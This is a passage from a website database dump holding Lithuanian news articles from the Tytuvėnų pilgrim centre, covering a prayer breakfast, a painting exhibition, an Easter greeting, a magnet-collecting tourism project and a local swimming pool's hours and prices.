atkūrimo 25 – tųjų metinių proga čia buvo surengti maldos pusryčiai.</span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Maldos pusryčių ištakos siekia 1942 m. kuomet keletas JAV senato narių pradėjo neformalius susitikimus dalinantis Kristaus mokymu siekiant nuoširdaus bendravimo ir tarpusavio supratimo. Laikui bėgant ši tradicija iš Baltųjų rūmų pasklido ir kitose valstijose, kur prie bendro stalo susėsdavo šerifas, klebonas, pastorius ir eilinis miestelėnas ar fermeris. Maldos pusryčiai  vyksta be pompastikos, neutralioje, nuoširdžioje, visiems priimtinoje aplinkoje, kur visi gerai jaustųsi ir susikauptų maldai ir diskusijoms.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Pirmas toks sambūris – Nacionaliniai maldos pusryčiai - Lietuvoje rengtas prezidentūroje, kuomet šalies vadovas buvo Valdas Adamkus. Vėliau ši idėja parlamentarų paskleista visoje Lietuvoje.  </span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Kelmės rajone maldos pusryčių iniciatorius buvo Nepriklausomybės akto signataras Antanas Račas. Jo paskatinti į pirmuosius  maldos pusryčius tytuvėniškius sukvietė Vyrų katalikų brolija. Brolijos tikslas buvo  suburti, apjungti skirtingai mąstančius, ne vienodus interesus turinčius miestelėnus, kad Dievo žodis pakviestų neužsidaryti savo kiaute, netapti kurčiam ir nebyliu, kad nepaisant skirtumų žmonės būtų sąjungininkais, bet ne priešininkais. Šiemet nutarta maldos pusryčius rengti vienuolyno refektorinėje salėje, kurioje daugiau nei du šimtmečius kasdien rinkdavosi broliai pranciškonai,  padėkoti Dievui už bendrystę ir kasdienę duoną. Piligrimų centro kolektyvas jau keletą dienų prieš šventę pradėjo ruošti senąją vienuolyno salę, galvojo kaip po senaisiais skliautais sutalpinti čia neįprastai didelį svečių būrį.<br /></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Renginį režisavo ir vedė Monika Žukauskaitė - Tytuvėnų kultūros centro kolektyvų vadovė. Pusryčius malda pradėjo  parapijos klebonas Rimantas Žaromskis. Pranešimą paruošė gimnazijos istorijos mokytojas Robertas Mosėjus. Tema „Savanorystė“ kalbėjo regioninio parko direktorius Vytautas Stonys. Tikybos mokytoja Regina Vaičiulienė pristatė mokinę Emą Banaitytę, kuriai svarbios savanotystės idėjos. Tytuvėnų gimnazijos meno skyriaus mokiniai ir mokytojai, susibūrimą paįvairino muzika ir giesmėmis</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Džiugu kad tytuvėniškiai neliko abejingi akcijai pakvietusiai pinti trispalves draugystės apyrankes. Šventės išvakarėse mokiniai aplankė miestelio įstaigas ir visiems padovanojo savo darbelius. Tarp pusryčių dalyvių galėjai matyti pasipuošusių trispalvėmis draugystės apyrankėmis, sagėmis. Džiugu, kad Lietuvos nacionalinės spalvos ne tik plazdančiose vėliavose, bet puošia ir išskiria mus, jos priimamos kaip šventės liudijimas.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Renginys pradėtas malda, malda ir buvo pabaigtas, vėliau aukotos Šv. Mišios už Tėvynę, o Tytuvėnų  kultūros centre meno kolektyvų koncertas.<br /></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Nuotraukos Česlovo Gudausko.<br /><br /><br />Rūta Krencienė <br />VšĮ „Tytuvėnų piligrimų centras“<br />gidė-vadybininkė<br /><br /></span></p>\r\n<p><img src=\"images/stories/naujienos/maldos_pusryciai/1.JPG\" border=\"0\" alt=\"\" /></p>\r\n<p><img src=\"images/stories/naujienos/maldos_pusryciai/2.JPG\" border=\"0\" alt=\"\" /></p>\r\n<p><img src=\"images/stories/naujienos/maldos_pusryciai/3.JPG\" border=\"0\" alt=\"\" /></p>\r\n<p><img src=\"images/stories/naujienos/maldos_pusryciai/4.JPG\" border=\"0\" alt=\"\" /></p>\r\n<p><img src=\"images/stories/naujienos/maldos_pusryciai/5.JPG\" border=\"0\" alt=\"\" /></p>\r\n<p><img src=\"images/stories/naujienos/maldos_pusryciai/6.JPG\" border=\"0\" alt=\"\" /></p>',1,0,0,44,'2015-03-17 13:22:11',135,'','2015-03-17 13:22:19',135,0,'0000-00-00 00:00:00','2015-03-17 13:22:11','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/maldos_pusryciai\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,0,143,'','',1,3827,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(229,317,'Tapybos paroda ir  \"Piligrimų gira\" pristatymas','tapybos-parodos-atidarymas-ir-edukacines-programos-piligrimu-gira-pristatymas','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Visus kviečiame š.m. balandžio 10 d. 14 val. į Tapybos parodos atidarymą ir edukacinės programos \"Piligrimų gira\" pristatymą.<br />Prašome iš anksto registruotis telefonu 867497392 arba 842756223</span></p>\r\n','\r\n<p><img src=\"images/stories/naujienos/gira/kvietimasok.jpg\" border=\"0\" alt=\"\" /></p>\r\n<p><img src=\"images/stories/naujienos/gira/1ok.jpg\" border=\"0\" alt=\"\" /></p>\r\n<p><img src=\"images/stories/naujienos/gira/2ok.jpg\" border=\"0\" alt=\"\" /></p>',1,0,0,44,'2015-03-27 04:58:11',135,'','2015-03-27 05:03:18',135,0,'0000-00-00 00:00:00','2015-03-27 04:58:11','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/gira\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',6,0,142,'','',1,3516,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(230,318,'Šv. Velykų sveikinimas','sv-velyku-sveikinimas','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Mielieji,<br />Velykų džiaugsmas ir palaima Telydi Jūs žingsnius visus, Tegul varpai pašaukia laimę, Te žodžiai atneša džiaugsmus! Sveikiname visus artėjančių Šv. Vėlykų proga.</span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><img src=\"images/stories/naujienos/velykos2015/sveikinimas.jpg\" border=\"0\" alt=\"\" /></span></p>',1,0,0,44,'2015-04-04 04:42:02',135,'','2015-04-04 04:42:14',135,0,'0000-00-00 00:00:00','2015-04-04 04:42:02','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/velykos2015\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,0,141,'','',1,3370,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(231,319,'Piligrimų gira','piligrimu-gira','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">VšĮ „Tytuvėnų piligrimų centras“ su nekantrumu laukia prasidėsiančio vasaros  turizmo sezono, kuris kaip visada bus pilnas įspūdžių, pažinčių ir įdomių žmonių. Kiekviena vasara atneša mūsų kolektyvui naujų idėjų, naujų patirčių. </span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">{gallery cols=5 orientation=horizontal width=166}stories/naujienos/piligrimu_gira{/gallery}</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Šiais metais turistus, piligrimus ir lankytojus pasitinkame su nauja edukacine programa „Piligrimų gira“, įrengta virtuve ir Piligrimų svetaine Tytuvėnų vienuolyne. Atvykę  į Tytuvėnų vienuolyną galite atsigerti kavos ar įsigyti  išsinešimui, papietauti su draugų ar kolektyvo grupe, paragauti ir įsigyti naminės giros. </span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Edukacinę programą „Piligrimų gira“, pusryčius, pietus ar vakarienę reikia užsisakyti aš anksto.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Atvykite pas mus ir būsite apsupti unikalios aplinkos, priimti su šypsenomis ir išlydėti su geromis emocijomis.<br /></span></p>\r\n<p> </p>\r\n<p> </p>',1,0,0,44,'2015-04-14 08:00:38',135,'','2015-04-16 07:53:43',135,0,'0000-00-00 00:00:00','2015-04-14 08:00:38','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/piligrimu_gira\\/main\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,0,140,'','',1,4770,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(323,412,'Iššūkis – „Surink Lietuvą“','kvieciame-visus-i-vakariene-baltas-vakaras-2','','<p>Iššūkis – „Surink Lietuvą“</p>\r\n','\r\n<p style=\"text-align: justify;\"><strong style=\"font-size: 12.16px;\">Mėgsti keliauti ir ieškai naujų iššūkių? Jei taip, turim tau bei tavo draugams puikią idėją! Liepos 12 d. startuoja projektas, sujungęs visas 60 savivaldybių, ”Surink Lietuvą”, kurio esmė Lietuvos šimtmečio proga, paskatinti žmones ne tik keliauti po savo kraštą, tačiau ir pažinti kiekvieną jo lopinėlį. Koks viso to tikslas? Ogi, kiekviename aplankytame krašte gausi puikią galimybę įsigyti to krašto formos magnetuką, surinkus visas 60 dalių - sujungti jas į vieną visumą -Lietuvos žemėlapį!</strong></p>\r\n<p style=\"text-align: justify;\"><span style=\"font-size: 12.16px;\">Šis projektas inicijuotas VšĮ Ukmergės turizmo ir verslo informacijos centro apjungė visą Lietuvą, -  60 savivaldybių. Žemėlapio kūrimas užtruko net devynis mėnesius, buvo rinkta informacija iš visos Lietuvos, bendradarbiauta su turizmo informacijos centrais, muziejais, bibliotekomis, regioniniais parkais ir kitomis įstaigomis. Kiekviena informacija atskirai ištyrinėta ieškant patraukliausio būdo ją pavaizduoti, tokiame mažame plotelyje. </span></p>\r\n<p><span style=\"font-size: 12.16px;\">„Tai pirmas tokio pobūdžio projektas, apjungęs visą Lietuvą. Neabejojame, kad jis prisidės prie vietinio turizmo aukso amžiaus, juk kelionės po savo šalį ir atradimai regionuose yra tikras magnetas turistams!“, - projektą palaiko laikina Turizmo departamento vadovė Indrė Trakimaitė-Šeškuvienė.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"font-size: 12.16px;\">Daugeliui Lietuva dar yra neatrastas kraštas, bet jis turi ką papasakoti, parodyti ar padegustuoti. Kiekvienas magnetas tai lyg atskira istorija - Kelmės krašto magnetukas pasakoja apie kultūrinį krašto išskirtinumą, Akmenės - apie dinozaurus ir drugelius, Marijampolės - apie kates, kurias taip mylėjo grafienė, o kur dar gausybė dvarų, bokštų, įdomių asmenybių..Jūsų laukia 60 įdomiausių pasakojimų, potyrių ir nuotykių. Šias istorijas taip pat galėsite išgirsti per radiją „Extra FM“, kuri kiekvieną savaitę pakvies aplankyti ir susipažinti vis su nauju rajonu. Dar vienas mūsų projekto partneris - vežėjas UAB „Kautra“, kuris skatins keliauti po Lietuvą suteikdamas nuolaidas.  Tai jei jau susidomėjai, paskubėk, įsigyti savo krašto detalę, nes pradžioje išleidome tik 1000 Lietuvos žemėlapių.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"font-size: 12.16px;\">Daugiau informacijos apie nuolaidas kelionėms po Lietuvą, projekto eigą, bei įspūdžius galite rasti mūsų socialiniame tinklapyje facebook – „Surink Lietuvą“.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"> <img src=\"images/1s.png\" border=\"0\" alt=\"\" /><br /><img src=\"images/3s.png\" border=\"0\" alt=\"\" /><br /><img src=\"images/2s.jpg\" border=\"0\" alt=\"\" /><br /></span></span></span></span></span></p>',1,0,0,44,'2017-08-06 08:07:32',135,'','2018-07-12 11:39:13',135,0,'0000-00-00 00:00:00','2017-08-06 08:07:32','0000-00-00 00:00:00','{\"image_intro\":\"images\\/1s.png\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',6,0,65,'','',1,2872,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(232,320,'Dėmesio aktyvaus poilsio mylėtojai!','demesio-aktyvaus-poilsio-myletojai','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Atrodo vasara neužkalnų, tačiau saulė mūsų dar nelepina. O taip visi laukiam vasariškos šilumos, ir taip vilioja ežero vanduo, kuris taip arti ir tuo pačiu toks šaltas.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Mėgstantiems vandens procedūras yra suteikta puiki galimybė apsilankyti VŠĮ Kelmės PRC Tytuvėnų skyriaus baseine. Naujai sutvarkytas baseinas ir patalpos, įrengtos pirtys leis prisiminti plaukimo įgudžius artėjant vasaros sezonui. Apsilankykite, nenusivilsite </span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><strong><img src=\"images/stories/naujienos/baseinas/5224.JPG\" border=\"0\" alt=\"\" /></strong></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><strong>VŠĮ KELMĖS PRC TYTUVĖNŲ SKYRIAUS</strong><br /><br />Baseino darbo grafikas:<br /><br /> Pirmadienis 15<sup>00</sup> – 21<sup>00</sup> val. Abonentinės grupės<br /><br /> Antradienis 14<sup>30</sup> – 21<sup>00</sup> val.<br /><br /> Trečiadienis 14<sup>30</sup> – 21<sup>00</sup> val.<br /><br /> Ketvirtadienis 15<sup>00</sup> – 21<sup>00</sup> val. Abonentinės grupės<br /><br /> Penktadienis 14<sup>30</sup> – 21<sup>00</sup> val.<br /><br /> Šeštadienis 11<sup>00</sup> – 21<sup>00</sup> val.<br /><br /> Sekmadienis 11<sup>00</sup> – 21<sup>00</sup> val.<br /><br />Baseino ir pirčių 1-os valandos kaina:<br /><br />Suaugusiems 8 Lt 2,32 Eur<br /><br />Moksleiviams ir studentams 7 Lt 2,03 Eur<br /><br />Ikimokyklinio amžiaus vaikams 5 Lt 1,45 Eur<br /><br />Šeimai: vaikams 5 Lt 1,45 Eur,  tėvams 7 Lt 2,03 Eur<br /><br />VšĮ Kelmės profesinio rengimo centro mokiniams 3 Lt 0,87 Eur<br /><br />Adresas Budraičių km., Tytuvėnų apyl. sen., Kelmės raj.<br /><br />Informacija teikiama telefonais: 861865242, 861122185</span></p>',1,0,0,44,'2015-04-14 12:17:36',135,'','2015-04-16 18:05:44',135,135,'2015-04-16 18:05:44','2015-04-14 12:17:36','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/baseinas\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,0,139,'','',1,5714,'{\"robots\":\"\",\